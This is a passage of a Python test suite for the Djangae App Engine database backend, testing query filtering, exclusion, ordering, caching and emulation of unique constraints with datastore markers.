instance2 = ModelWithNullableCharField.objects.create(some_id=999, field1="test") # Create a nullable thing
self.assertItemsEqual([instance], ModelWithNullableCharField.objects.filter(some_id=999).exclude(field1="test").all())
instance.field1 = "bananas"
instance.save()
self.assertEqual(instance, ModelWithNullableCharField.objects.filter(some_id=999).exclude(field1="test")[0])
def test_null_date_field(self):
null_date = NullDate()
null_date.save()
null_date = NullDate.objects.get()
self.assertIsNone(null_date.date)
self.assertIsNone(null_date.time)
self.assertIsNone(null_date.datetime)
def test_convert_unicode_subclasses_to_unicode(self):
# The App Engine SDK raises BadValueError if you try saving a SafeText
# string to a CharField. Djangae explicitly converts it to unicode.
grue = SafeText(u'grue')
self.assertIsInstance(grue, unicode)
self.assertNotEqual(type(grue), unicode)
obj = TestFruit.objects.create(name=u'foo', color=grue)
obj = TestFruit.objects.get(pk=obj.pk)
self.assertEqual(type(obj.color), unicode)
obj = TestFruit.objects.filter(color=grue)[0]
self.assertEqual(type(obj.color), unicode)
def test_notsupportederror_thrown_on_too_many_inequalities(self):
TestFruit.objects.create(name="Apple", color="Green", origin="England")
pear = TestFruit.objects.create(name="Pear", color="Green")
banana = TestFruit.objects.create(name="Banana", color="Yellow")
# Excluding one field is fine
self.assertItemsEqual([pear, banana], list(TestFruit.objects.exclude(name="Apple")))
# Excluding a field, and doing a > or < on another is not so fine
with self.assertRaises(NotSupportedError):
self.assertEqual(pear, TestFruit.objects.exclude(origin="England").filter(color__lt="Yellow").get())
# Same with excluding two fields
with self.assertRaises(NotSupportedError):
list(TestFruit.objects.exclude(origin="England").exclude(color="Yellow"))
# But apparently excluding the same field twice is OK
self.assertItemsEqual([banana], list(TestFruit.objects.exclude(origin="England").exclude(name="Pear").order_by("origin")))
def test_excluding_pks_is_emulated(self):
apple = TestFruit.objects.create(name="Apple", color="Green", is_mouldy=True, origin="England")
banana = TestFruit.objects.create(name="Banana", color="Yellow", is_mouldy=True, origin="Dominican Republic")
cherry = TestFruit.objects.create(name="Cherry", color="Red", is_mouldy=True, origin="Germany")
pear = TestFruit.objects.create(name="Pear", color="Green", origin="England")
self.assertEqual([apple, pear], list(TestFruit.objects.filter(origin__lt="Germany").exclude(pk=banana.pk).exclude(pk=cherry.pk).order_by("origin")))
self.assertEqual([apple, cherry], list(TestFruit.objects.exclude(origin="Dominican Republic").exclude(pk=pear.pk).order_by("origin")))
self.assertEqual([], list(TestFruit.objects.filter(is_mouldy=True).filter(color="Green", origin__gt="England").exclude(pk=pear.pk).order_by("-origin")))
self.assertEqual([cherry, banana], list(TestFruit.objects.exclude(pk=pear.pk).order_by("-name")[:2]))
self.assertEqual([banana, apple], list(TestFruit.objects.exclude(pk=pear.pk).order_by("origin", "name")[:2]))
def test_datetime_fields(self):
date = datetime.datetime.today()
dt = datetime.datetime.now()
time = datetime.time(0,0,0)
# check if creating objects work
obj = NullDate.objects.create(date=date, datetime=dt, time=time)
# check if filtering objects work
self.assertItemsEqual([obj], NullDate.objects.filter(datetime=dt))
self.assertItemsEqual([obj], NullDate.objects.filter(date=date))
self.assertItemsEqual([obj], NullDate.objects.filter(time=time))
# check if updating objects work
obj.date = date + datetime.timedelta(days=1)
obj.datetime = dt + datetime.timedelta(days=1)
obj.time = datetime.time(23,0,0)
obj.save()
self.assertItemsEqual([obj], NullDate.objects.filter(datetime=obj.datetime))
self.assertItemsEqual([obj], NullDate.objects.filter(date=obj.date))
self.assertItemsEqual([obj], NullDate.objects.filter(time=obj.time))
def test_related_datetime_nullable(self):
date = datetime.datetime.today()
dt = datetime.datetime.now()
time = datetime.time(0,0,0)
date_set = NullDateSet.objects.create()
empty_obj = NullDate.objects.create(date=None, datetime=None, time=None)
date_set.dates.add(empty_obj)
obj = NullDate.objects.create(date=date, datetime=dt, time=time)
date_set.dates.add(obj)
date_set.save()
# check if filtering/excluding of None works in RelatedSetField
self.assertItemsEqual([obj], date_set.dates.filter(datetime__isnull=False))
self.assertItemsEqual([obj], date_set.dates.filter(date__isnull=False))
self.assertItemsEqual([obj], date_set.dates.filter(time__isnull=False))
self.assertItemsEqual([obj], date_set.dates.exclude(datetime=None))
self.assertItemsEqual([obj], date_set.dates.exclude(date=None))
self.assertItemsEqual([obj], date_set.dates.exclude(time=None))
# sorting should work too
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('datetime'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-datetime'))
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('date'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-date'))
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('time'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-time'))
def test_update_query_does_not_update_entities_which_no_longer_match_query(self):
""" When doing queryset.update(field=x), any entities which the query returns but which no
longer match the query (due to eventual consistency) should not be altered.
"""
obj = TestFruit.objects.create(name='apple', color='green', is_mouldy=False)
with inconsistent_db(probability=0):
# alter our object, so that it should no longer match the query that we then do
obj.color = 'blue'
obj.save()
# Now run a query, our object is changed, but the inconsistency means it will still match
queryset = TestFruit.objects.filter(color='green')
assert queryset.count(), "inconsistent_db context manager isn't working" # sanity
# Now run an update with that query, the update should NOT be applied, because it
# should re-check that the object still matches the query
queryset.update(is_mouldy=True)
obj = TestFruit.objects.get(pk=obj.pk)
self.assertFalse(obj.is_mouldy)
class ModelFormsetTest(TestCase):
    def test_reproduce_index_error(self):
        """Regression test: binding a formset to POST data that declares
        TOTAL_FORMS=0 (while still carrying form-0-* keys) must not crash
        with an IndexError. No assertions — constructing the formsets is
        the test."""
        class TestModelForm(ModelForm):
            class Meta:
                model = TestUser
                fields = ("username", "email", "field2")

        test_model = TestUser.objects.create(username='foo', field2='bar')
        TestModelFormSet = modelformset_factory(TestUser, form=TestModelForm, extra=0)
        # Unbound formset over the single existing instance.
        TestModelFormSet(queryset=TestUser.objects.filter(pk=test_model.pk))
        # Management form deliberately claims zero forms despite form-0 data.
        data = {
            'form-INITIAL_FORMS': 0,
            'form-MAX_NUM_FORMS': 0,
            'form-TOTAL_FORMS': 0,
            'form-0-id': test_model.id,
            'form-0-field1': 'foo_1',
            'form-0-field2': 'bar_1',
        }
        factory = RequestFactory()
        request = factory.post('/', data=data)
        TestModelFormSet(request.POST, request.FILES)
class CacheTests(TestCase):
    """Basic sanity checks for the configured Django cache backend."""

    def test_cache_set(self):
        """A value that was just stored can be read straight back."""
        key, value = 'test?', 'yes!'
        cache.set(key, value)
        fetched = cache.get(key)
        self.assertEqual(fetched, value)

    def test_cache_timeout(self):
        """A value stored with a 1-second timeout expires after sleeping."""
        import time
        key, value = 'test?', 'yes!'
        cache.set(key, value, 1)
        time.sleep(1)
        fetched = cache.get(key)
        self.assertEqual(fetched, None)
class ConstraintTests(TestCase):
    """
    Tests for unique constraint handling.

    Djangae emulates uniqueness on the App Engine datastore with
    UniqueMarker entities; these tests assert markers are created,
    updated and deleted in lockstep with model instances.
    """

    def test_update_updates_markers(self):
        """Saving a changed unique value replaces the marker (same count,
        new key derived from the md5 of the new value)."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        instance = ModelWithUniques.objects.create(name="One")
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
        qry = datastore.Query(UniqueMarker.kind())
        qry.Order(("created", datastore.Query.DESCENDING))
        marker = [x for x in qry.Run()][0]
        # Make sure we assigned the instance
        self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
        expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
        self.assertEqual(expected_marker, marker.key().id_or_name())
        instance.name = "Two"
        instance.save()
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
        marker = [x for x in qry.Run()][0]
        # Make sure we assigned the instance
        self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
        expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("Two").hexdigest())
        self.assertEqual(expected_marker, marker.key().id_or_name())

    def test_conflicting_insert_throws_integrity_error(self):
        """Creating a second instance with a duplicate unique value fails."""
        ModelWithUniques.objects.create(name="One")
        with self.assertRaises(IntegrityError):
            ModelWithUniques.objects.create(name="One")

    def test_table_flush_clears_markers_for_that_table(self):
        """Flushing one table frees its unique values, but not other tables'."""
        ModelWithUniques.objects.create(name="One")
        UniqueModel.objects.create(unique_field="One")
        from djangae.db.backends.appengine.commands import FlushCommand
        FlushCommand(ModelWithUniques._meta.db_table).execute()
        ModelWithUniques.objects.create(name="One")
        with self.assertRaises(IntegrityError):
            UniqueModel.objects.create(unique_field="One")

    def test_recently_deleted_unique_doesnt_come_back(self):
        """A delete under eventual consistency must not resurrect the row in
        query results (markers are consulted, not just the index)."""
        instance = ModelWithUniques.objects.create(name="One")
        with inconsistent_db():
            instance.delete()
            self.assertEqual(0, ModelWithUniques.objects.filter(name="One").count())
            self.assertFalse(ModelWithUniques.objects.filter(name="One").exists())
            self.assertFalse(list(ModelWithUniques.objects.all()))  # Triple-check

    def test_conflicting_update_throws_integrity_error(self):
        """Updating into a value held by another instance fails."""
        ModelWithUniques.objects.create(name="One")
        instance = ModelWithUniques.objects.create(name="Two")
        with self.assertRaises(IntegrityError):
            instance.name = "One"
            instance.save()

    def test_unique_combinations_are_returned_correctly(self):
        """_unique_combinations includes the pk only when ignore_pk=False;
        unique_identifiers_from_entity derives one identifier per combination."""
        combos_one = _unique_combinations(ModelWithUniquesOnForeignKey, ignore_pk=True)
        combos_two = _unique_combinations(ModelWithUniquesOnForeignKey, ignore_pk=False)
        self.assertEqual([['name', 'related_name'], ['name'], ['related_name']], combos_one)
        self.assertEqual([['name', 'related_name'], ['id'], ['name'], ['related_name']], combos_two)

        class Entity(dict):
            # Minimal stand-in for a datastore entity: a dict with a key().
            def __init__(self, model, id):
                self._key = datastore.Key.from_path(model, id)

            def key(self):
                return self._key

        e1 = Entity(ModelWithUniquesOnForeignKey._meta.db_table, 1)
        e1["name"] = "One"
        e1["related_name_id"] = 1
        ids_one = unique_identifiers_from_entity(ModelWithUniquesOnForeignKey, e1)
        self.assertItemsEqual([
            u'djangae_modelwithuniquesonforeignkey|id:1',
            u'djangae_modelwithuniquesonforeignkey|name:06c2cea18679d64399783748fa367bdd',
            u'djangae_modelwithuniquesonforeignkey|related_name_id:1',
            u'djangae_modelwithuniquesonforeignkey|name:06c2cea18679d64399783748fa367bdd|related_name_id:1'
        ], ids_one)

    def test_error_on_update_doesnt_change_markers(self):
        """If the entity Put fails mid-update, the existing marker must be
        left pointing at the old value (no orphaned "Two" marker)."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        instance = ModelWithUniques.objects.create(name="One")
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
        qry = datastore.Query(UniqueMarker.kind())
        qry.Order(("created", datastore.Query.DESCENDING))
        marker = [x for x in qry.Run()][0]
        # Make sure we assigned the instance
        self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
        expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
        self.assertEqual(expected_marker, marker.key().id_or_name())
        instance.name = "Two"
        from djangae.db.backends.appengine.commands import datastore as to_patch
        try:
            original = to_patch.Put

            def func(*args, **kwargs):
                # Let marker Puts through, but blow up on the entity Put.
                kind = args[0][0].kind() if isinstance(args[0], list) else args[0].kind()
                if kind == UniqueMarker.kind():
                    return original(*args, **kwargs)
                raise AssertionError()

            to_patch.Put = func
            with self.assertRaises(Exception):
                instance.save()
        finally:
            to_patch.Put = original
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
        marker = [x for x in qry.Run()][0]
        # Make sure we assigned the instance
        self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
        expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
        self.assertEqual(expected_marker, marker.key().id_or_name())

    def test_error_on_insert_doesnt_create_markers(self):
        """If the entity Put fails on insert, no markers are left behind."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        from djangae.db.backends.appengine.commands import datastore as to_patch
        try:
            original = to_patch.Put

            def func(*args, **kwargs):
                # Let marker Puts through, but blow up on the entity Put.
                kind = args[0][0].kind() if isinstance(args[0], list) else args[0].kind()
                if kind == UniqueMarker.kind():
                    return original(*args, **kwargs)
                raise AssertionError()

            to_patch.Put = func
            with self.assertRaises(AssertionError):
                ModelWithUniques.objects.create(name="One")
        finally:
            to_patch.Put = original
        self.assertEqual(0, datastore.Query(UniqueMarker.kind()).Count() - initial_count)

    def test_delete_clears_markers(self):
        """Deleting an instance deletes its unique markers."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        instance = ModelWithUniques.objects.create(name="One")
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
        instance.delete()
        self.assertEqual(0, datastore.Query(UniqueMarker.kind()).Count() - initial_count)

    @override_settings(DJANGAE_DISABLE_CONSTRAINT_CHECKS=True)
    def test_constraints_disabled_doesnt_create_or_check_markers(self):
        """With checks globally disabled, no markers are written and
        duplicate unique values are allowed."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        instance1 = ModelWithUniques.objects.create(name="One")
        self.assertEqual(initial_count, datastore.Query(UniqueMarker.kind()).Count())
        instance2 = ModelWithUniques.objects.create(name="One")
        self.assertEqual(instance1.name, instance2.name)
        self.assertFalse(instance1 == instance2)

    @override_settings(DJANGAE_DISABLE_CONSTRAINT_CHECKS=True)
    def test_constraints_can_be_enabled_per_model(self):
        """A model's Djangae.disable_constraint_checks = False overrides the
        global DJANGAE_DISABLE_CONSTRAINT_CHECKS setting."""
        initial_count = datastore.Query(UniqueMarker.kind()).Count()
        ModelWithUniquesAndOverride.objects.create(name="One")
        self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)

    # NOTE(review): "constaints" typo is kept — renaming a test method would
    # change the suite's public surface for anyone addressing it by name.
    def test_list_field_unique_constaints(self):
        """Unique list fields conflict when any element is shared."""
        instance1 = UniqueModel.objects.create(unique_field=1, unique_combo_one=1, unique_list_field=["A", "C"])
        with self.assertRaises((IntegrityError, DataError)):
            UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_list_field=["A"])
        instance2 = UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_list_field=["B"])
        instance2.unique_list_field = instance1.unique_list_field
        with self.assertRaises((IntegrityError, DataError)):
            instance2.save()
        instance1.unique_list_field = []
        instance1.save()
        instance2.save()

    def test_list_field_unique_constraints_validation(self):
        """full_clean() on unique list fields requires the UniquenessMixin."""
        instance1 = UniqueModel(
            unique_set_field={"A"},
            unique_together_list_field=[1],
            unique_field=1,
            unique_combo_one=1,
            unique_list_field=["A", "C"]
        )
        # Without a custom mixin, Django can't construct a unique validation query for a list field
        self.assertRaises(BadValueError, instance1.full_clean)
        UniqueModel.__bases__ = (UniquenessMixin,) + UniqueModel.__bases__
        try:
            instance1.full_clean()
            instance1.save()
            # Check the uniqueness mixing works with long lists
            instance1.unique_list_field = [x for x in range(31)]
            try:
                instance1.full_clean()
            except NotSupportedError:
                self.fail("Couldn't run unique check on long list field")
            # BUG FIX: a stray bare `return` previously sat here, making
            # everything below unreachable — including the ValidationError
            # assertion and the restoration of UniqueModel.__bases__.
            instance2 = UniqueModel(
                unique_set_field={"B"},
                unique_together_list_field=[2],
                unique_field=2,
                unique_combo_one=2,
                unique_list_field=["B", "C"]  # duplicate value C!
            )
            self.assertRaises(ValidationError, instance2.full_clean)
        finally:
            # Always undo the __bases__ patch so other tests see the
            # unmodified model class.
            UniqueModel.__bases__ = (models.Model,)

    def test_set_field_unique_constraints(self):
        """Unique set fields conflict on shared elements; empty sets never
        conflict with each other."""
        instance1 = UniqueModel.objects.create(unique_field=1, unique_combo_one=1, unique_set_field={"A", "C"})
        with self.assertRaises((IntegrityError, DataError)):
            UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_set_field={"A"})
        instance2 = UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_set_field={"B"})
        instance2.unique_set_field = instance1.unique_set_field
        with self.assertRaises((IntegrityError, DataError)):
            instance2.save()
        instance1.unique_set_field = set()
        instance1.save()
        instance2.save()
        instance2.unique_set_field = set()
        instance2.save()  # You can have two fields with empty sets

    def test_unique_constraints_on_model_with_long_str_pk(self):
        """ Check that an object with a string-based PK of 500 characters (the max that GAE allows)
        can still have unique constraints pointing at it. (See #242.)
        """
        obj = UniqueModelWithLongPK(pk="x" * 500, unique_field=1)
        obj.save()
        duplicate = UniqueModelWithLongPK(pk="y" * 500, unique_field=1)
        self.assertRaises(IntegrityError, duplicate.save)
class EdgeCaseTests(TestCase):
    def setUp(self):
        """Create five users (usernames A-E, fixed ids 1-5, some sharing
        emails) and two fruits; register an iexact special index on
        TestUser.username for the special-index tests."""
        super(EdgeCaseTests, self).setUp()
        add_special_index(TestUser, "username", "iexact")
        self.u1 = TestUser.objects.create(username="A", email="test@example.com", last_login=datetime.datetime.now().date(), id=1)
        self.u2 = TestUser.objects.create(username="B", email="test@example.com", last_login=datetime.datetime.now().date(), id=2)
        self.u3 = TestUser.objects.create(username="C", email="test2@example.com", last_login=datetime.datetime.now().date(), id=3)
        self.u4 = TestUser.objects.create(username="D", email="test3@example.com", last_login=datetime.datetime.now().date(), id=4)
        self.u5 = TestUser.objects.create(username="E", email="test3@example.com", last_login=datetime.datetime.now().date(), id=5)
        self.apple = TestFruit.objects.create(name="apple", color="red")
        self.banana = TestFruit.objects.create(name="banana", color="yellow")
    def test_querying_by_date(self):
        """DateField comparison lookups (__lt/__gt/__gte) behave as expected."""
        instance1 = ModelWithDates.objects.create(start=datetime.date(2014, 1, 1), end=datetime.date(2014, 1, 20))
        instance2 = ModelWithDates.objects.create(start=datetime.date(2014, 2, 1), end=datetime.date(2014, 2, 20))
        self.assertEqual(instance1, ModelWithDates.objects.get(start__lt=datetime.date(2014, 1, 2)))
        self.assertEqual(2, ModelWithDates.objects.filter(start__lt=datetime.date(2015, 1, 1)).count())
        self.assertEqual(instance2, ModelWithDates.objects.get(start__gt=datetime.date(2014, 1, 2)))
        self.assertEqual(instance2, ModelWithDates.objects.get(start__gte=datetime.date(2014, 2, 1)))
    def test_double_starts_with(self):
        """OR-ing two __startswith querysets returns the union; the queryset
        is lazy, so counts grow as matching users are created."""
        qs = TestUser.objects.filter(username__startswith='Hello') | TestUser.objects.filter(username__startswith='Goodbye')
        self.assertEqual(0, qs.count())
        TestUser.objects.create(username="Hello")
        self.assertEqual(1, qs.count())
        TestUser.objects.create(username="Goodbye")
        self.assertEqual(2, qs.count())
        TestUser.objects.create(username="Hello and Goodbye")
        self.assertEqual(3, qs.count())
    def test_impossible_starts_with(self):
        """AND-ing two mutually-exclusive __startswith filters yields nothing
        (a string cannot start with both prefixes)."""
        TestUser.objects.create(username="Hello")
        TestUser.objects.create(username="Goodbye")
        TestUser.objects.create(username="Hello and Goodbye")
        qs = TestUser.objects.filter(username__startswith='Hello') & TestUser.objects.filter(username__startswith='Goodbye')
        self.assertEqual(0, qs.count())
    def test_datetime_contains(self):
        """
        Django allows for __contains on datetime field, so that you can search for a specific
        date. This is probably just because SQL allows querying it on a string, and contains just
        turns into a like query. This test just makes sure we behave the same
        """
        instance = DateTimeModel.objects.create()  # Create a DateTimeModel, it has auto_now stuff
        # Make sure that if we query a datetime on a date it is properly returned
        self.assertItemsEqual([instance], DateTimeModel.objects.filter(datetime_field__contains=instance.datetime_field.date()))
        self.assertItemsEqual([instance], DateTimeModel.objects.filter(date_field__contains=instance.date_field.year))
    def test_combinations_of_special_indexes(self):
        """OR-ing an __iexact filter (special index, see setUp) with a
        __contains filter returns the union of both."""
        qs = TestUser.objects.filter(username__iexact='Hello') | TestUser.objects.filter(username__contains='ood')
        self.assertEqual(0, qs.count())
        TestUser.objects.create(username="Hello")
        self.assertEqual(1, qs.count())
        TestUser.objects.create(username="Goodbye")
        self.assertEqual(2, qs.count())
        TestUser.objects.create(username="Hello and Goodbye")
        self.assertEqual(3, qs.count())
    def test_multi_table_inheritance(self):
        """Multi-table inheritance: parent queries see child rows too, and
        each child table only sees its own instances."""
        parent = MultiTableParent.objects.create(parent_field="parent1")
        child1 = MultiTableChildOne.objects.create(parent_field="child1", child_one_field="child1")
        child2 = MultiTableChildTwo.objects.create(parent_field="child2", child_two_field="child2")
        self.assertEqual(3, MultiTableParent.objects.count())
        self.assertItemsEqual([parent.pk, child1.pk, child2.pk],
            list(MultiTableParent.objects.values_list('pk', flat=True)))
        self.assertEqual(1, MultiTableChildOne.objects.count())
        self.assertEqual(child1, MultiTableChildOne.objects.get())
        self.assertEqual(1, MultiTableChildTwo.objects.count())
        self.assertEqual(child2, MultiTableChildTwo.objects.get())
        self.assertEqual(child2, MultiTableChildTwo.objects.get(pk=child2.pk))
        self.assertTrue(MultiTableParent.objects.filter(pk=child2.pk).exists())
    def test_anding_pks(self):
        """Two contradictory pk equality filters yield an empty result."""
        results = TestUser.objects.filter(id__exact=self.u1.pk).filter(id__exact=self.u2.pk)
        self.assertEqual(list(results), [])
    def test_unusual_queries(self):
        """Grab-bag of IN / exclude / range combinations against the setUp
        fixtures, including empty __in lists on filter and exclude."""
        results = TestFruit.objects.filter(name__in=["apple", "orange"])
        self.assertEqual(1, len(results))
        self.assertItemsEqual(["apple"], [x.name for x in results])
        results = TestFruit.objects.filter(name__in=["apple", "banana"])
        self.assertEqual(2, len(results))
        self.assertItemsEqual(["apple", "banana"], [x.name for x in results])
        results = TestFruit.objects.filter(name__in=["apple", "banana"]).values_list('pk', 'color')
        self.assertEqual(2, len(results))
        self.assertItemsEqual([(self.apple.pk, self.apple.color), (self.banana.pk, self.banana.color)], results)
        results = TestUser.objects.all()
        self.assertEqual(5, len(results))
        results = TestUser.objects.filter(username__in=["A", "B"])
        self.assertEqual(2, len(results))
        self.assertItemsEqual(["A", "B"], [x.username for x in results])
        results = TestUser.objects.filter(username__in=["A", "B"]).exclude(username="A")
        self.assertEqual(1, len(results), results)
        self.assertItemsEqual(["B"], [x.username for x in results])
        results = TestUser.objects.filter(username__lt="E")
        self.assertEqual(4, len(results))
        self.assertItemsEqual(["A", "B", "C", "D"], [x.username for x in results])
        results = TestUser.objects.filter(username__lte="E")
        self.assertEqual(5, len(results))
        # Double exclude on different properties not supported
        with self.assertRaises(NotSupportedError):
            # FIXME: This should raise a NotSupportedError, but at the moment it's thrown too late in
            # the process and so Django wraps it as a DataError
            list(TestUser.objects.exclude(username="E").exclude(email="A"))
        # ...but excluding the same property twice is fine.
        results = list(TestUser.objects.exclude(username="E").exclude(username="A"))
        self.assertItemsEqual(["B", "C", "D"], [x.username for x in results])
        results = TestUser.objects.filter(username="A", email="test@example.com")
        self.assertEqual(1, len(results))
        # Repeated/overlapping __in filters intersect correctly.
        results = TestUser.objects.filter(username__in=["A", "B"]).filter(username__in=["A", "B"])
        self.assertEqual(2, len(results))
        self.assertItemsEqual(["A", "B"], [x.username for x in results])
        results = TestUser.objects.filter(username__in=["A", "B"]).filter(username__in=["A"])
        self.assertEqual(1, len(results))
        self.assertItemsEqual(["A"], [x.username for x in results])
        results = TestUser.objects.filter(pk__in=[self.u1.pk, self.u2.pk]).filter(username__in=["A"])
        self.assertEqual(1, len(results))
        self.assertItemsEqual(["A"], [x.username for x in results])
        results = TestUser.objects.filter(username__in=["A"]).filter(pk__in=[self.u1.pk, self.u2.pk])
        self.assertEqual(1, len(results))
        self.assertItemsEqual(["A"], [x.username for x in results])
        results = list(TestUser.objects.all().exclude(username__in=["A"]))
        self.assertItemsEqual(["B", "C", "D", "E"], [x.username for x in results])
        # Empty __in list: filter matches nothing, exclude removes nothing.
        results = list(TestFruit.objects.filter(name='apple', color__in=[]))
        self.assertItemsEqual([], results)
        results = list(TestUser.objects.all().exclude(username__in=[]))
        self.assertEqual(5, len(results))
        self.assertItemsEqual(["A", "B", "C", "D", "E"], [x.username for x in results])
        results = list(TestUser.objects.all().exclude(username__in=[]).filter(username__in=["A", "B"]))
        self.assertEqual(2, len(results))
        self.assertItemsEqual(["A", "B"], [x.username for x in results])
        results = list(TestUser.objects.all().filter(username__in=["A", "B"]).exclude(username__in=[]))
        self.assertEqual(2, len(results))
        self.assertItemsEqual(["A", "B"], [x.username for x in results])
    def test_empty_string_key(self):
        """An empty string is not a valid datastore key name: creation
        raises IntegrityError, and lookups/filters on '' match nothing."""
        # Creating
        with self.assertRaises(IntegrityError):
            TestFruit.objects.create(name='')
        # Getting
        with self.assertRaises(TestFruit.DoesNotExist):
            TestFruit.objects.get(name='')
        # Filtering
        results = list(TestFruit.objects.filter(name='').order_by("name"))
        self.assertItemsEqual([], results)
        # Combined filtering
        results = list(TestFruit.objects.filter(name='', color='red').order_by("name"))
        self.assertItemsEqual([], results)
        # IN query
        results = list(TestFruit.objects.filter(name__in=['', 'apple']))
        self.assertItemsEqual([self.apple], results)
    def test_or_queryset(self):
        """
        This constructs an OR query, this is currently broken in the parse_where_and_check_projection
        function. WE MUST FIX THIS!
        """
        q1 = TestUser.objects.filter(username="A")
        q2 = TestUser.objects.filter(username="B")
        self.assertItemsEqual([self.u1, self.u2], list(q1 | q2))
    def test_or_q_objects(self):
        """ Test use of Q objects in filters. """
        query = TestUser.objects.filter(Q(username="A") | Q(username="B"))
        self.assertItemsEqual([self.u1, self.u2], list(query))
def test_extra_select(self):
results = TestUser.objects.filter(username='A').extra(select={'is_a': "username = 'A'"})
self.assertEqual(1, len(results))
self.assertItemsEqual([True], [x.is_a for x in results])
results = TestUser.objects.all().exclude(username='A').extra(select={'is_a': "username = 'A'"})
self.assertEqual(4, len(results))
self.assertEqual(not any([x.is_a for x in results]), True)
# Up for debate
# results = User.objects.all().extra(select={'truthy': 'TRUE'})
# self.assertEqual(all([x.truthy for x in results]), True)
results = TestUser.objects.all().extra(select={'truthy': True})
self.assertEqual(all([x.truthy for x in results]), True)
def test_counts(self):
    """count() works across filter/exclude chains."""
    users = TestUser.objects
    self.assertEqual(5, users.count())
    self.assertEqual(2, users.filter(email="test3@example.com").count())
    self.assertEqual(3, users.exclude(email="test3@example.com").count())
    self.assertEqual(1, users.filter(username="A").exclude(email="test3@example.com").count())
    self.assertEqual(3, users.exclude(username="E").exclude(username="A").count())
def test_deletion(self):
    """Deletion via filtered and unfiltered querysets removes the expected rows."""
    count = TestUser.objects.count()
    self.assertTrue(count)  # fixture users must exist before we start
    TestUser.objects.filter(username="A").delete()
    self.assertEqual(count - 1, TestUser.objects.count())
    # A filter immediately contradicted by an exclude matches nothing.
    TestUser.objects.filter(username="B").exclude(username="B").delete() #Should do nothing
    self.assertEqual(count - 1, TestUser.objects.count())
    TestUser.objects.all().delete()
    count = TestUser.objects.count()
    self.assertFalse(count)  # table is now empty
def test_insert_with_existing_key(self):
    """Re-using an explicit primary key on create raises IntegrityError."""
    created = TestUser.objects.create(
        id=999, username="test1", last_login=datetime.datetime.now().date())
    self.assertEqual(999, created.pk)
    # Same explicit id again must be rejected rather than overwritten.
    with self.assertRaises(IntegrityError):
        TestUser.objects.create(id=999, username="test2", last_login=datetime.datetime.now().date())
def test_included_pks(self):
    """pk__in querysets can still be ordered by other fields."""
    pks = [TestUser.objects.get(username=name).pk for name in ("B", "A")]
    ordered = TestUser.objects.filter(pk__in=pks).order_by("username")
    self.assertEqual(ordered[0], self.u1)
    self.assertEqual(ordered[1], self.u2)
def test_select_related(self):
    """ select_related should be a no-op... for now """
    owner = TestUser.objects.get(username="A")
    Permission.objects.create(user=owner, perm="test_perm")
    related = [(perm.perm, perm.user.username) for perm in owner.permission_set.select_related()]
    self.assertEqual(owner.username, related[0][1])
def test_cross_selects(self):
    """values_list through a FK join is unsupported on the datastore backend."""
    user = TestUser.objects.get(username="A")
    Permission.objects.create(user=user, perm="test_perm")
    with self.assertRaises(NotSupportedError):
        perms = list(Permission.objects.all().values_list("user__username", "perm"))
        # NOTE(review): unreachable while the query raises as asserted above;
        # presumably leftover from before cross-model selects were restricted.
        self.assertEqual("A", perms[0][0])
def test_values_list_on_pk_does_keys_only_query(self):
    """values_list('pk') should issue a keys-only datastore query."""
    from google.appengine.api.datastore import Query
    def replacement_init(*args, **kwargs):
        # Record the constructor arguments, then delegate to the real __init__.
        replacement_init.called_args = args
        replacement_init.called_kwargs = kwargs
        original_init(*args, **kwargs)
    replacement_init.called_args = None
    replacement_init.called_kwargs = None
    try:
        original_init = Query.__init__
        Query.__init__ = replacement_init
        list(TestUser.objects.all().values_list('pk', flat=True))
    finally:
        # Always restore the real constructor, even if the query fails.
        Query.__init__ = original_init
    self.assertTrue(replacement_init.called_kwargs.get('keys_only'))
    self.assertEqual(5, len(TestUser.objects.all().values_list('pk')))
def test_iexact(self):
    """__iexact matches case-insensitively, including on non-string fields."""
    self.assertEqual("A", TestUser.objects.get(username__iexact="a").username)
    # A special index is needed before iexact works on an integer field.
    add_special_index(IntegerModel, "integer_field", "iexact")
    IntegerModel.objects.create(integer_field=1000)
    fetched = IntegerModel.objects.get(integer_field__iexact=str(1000))
    self.assertEqual(fetched.integer_field, 1000)
    self.assertEqual("A", TestUser.objects.get(id__iexact=str(self.u1.id)).username)
def test_ordering(self):
    """order_by works ascending and descending, on fields and on pks."""
    def names(queryset):
        return [user.username for user in queryset]
    self.assertEqual(["A", "B", "C", "D", "E"], names(TestUser.objects.all().order_by("username")))
    self.assertEqual(["E", "D", "C", "B", "A"], names(TestUser.objects.all().order_by("-username")))
    # Ordering by an unknown field is an error.
    with self.assertRaises(FieldError):
        list(TestUser.objects.order_by("bananas"))
    middle = [self.u2.id, self.u3.id, self.u4.id]
